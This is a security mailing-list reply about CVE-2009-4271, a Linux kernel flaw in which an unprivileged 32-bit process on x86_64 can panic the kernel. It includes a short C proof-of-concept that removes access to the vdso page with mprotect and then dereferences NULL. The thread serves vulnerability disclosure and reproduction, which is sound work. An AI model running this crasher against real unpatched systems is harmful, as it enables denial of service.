oss-sec mailing list archives

Re: CVE-2009-4271 kernel: 32bit process on 64bit system DoS

From: Marcus Meissner <meissner () suse de>
Date: Wed, 17 Mar 2010 15:07:59 +0100

On Wed, Mar 17, 2010 at 09:01:19AM +0800, Eugene Teo wrote:

STMicroelectronics reported a flaw in the Linux kernel, versions 2.6.9 
to 2.6.17, when running on x86_64, where a user could use a regular 
32bit process to trigger a kernel panic, without any special privileges. 
 The bug occurs when a 32bit user process triggers a segfault (i.e. 
de-reference a null-pointer) after having performed a mprotect() to 
restrict any rwx access on its VDSO page.

This only affects Red Hat Enterprise Linux 4.

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2009-4271


Would this be a valid reproducer? :

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

int main(){
        FILE *f;
        char line[256];
        void *x,*y;

        f = fopen("/proc/self/maps","r");
        if (!f) exit(1);

        x=y=NULL;
        while (fgets(line,sizeof(line),f)) {
                if (strstr(line,"vdso")) {
                        sscanf(line,"%p-%p ",&x,&y);
                        fprintf(stderr,"vdso %x\n", x);
                        break;
                }
        }
        if (!x) exit(1);

        mprotect(x,4096, PROT_NONE);
        *(char*)NULL = NULL;
}

Ciao, Marcus

Current thread:

CVE-2009-4271 kernel: 32bit process on 64bit system DoS Eugene Teo (Mar 16)
- Re: CVE-2009-4271 kernel: 32bit process on 64bit system DoS Marcus Meissner (Mar 17)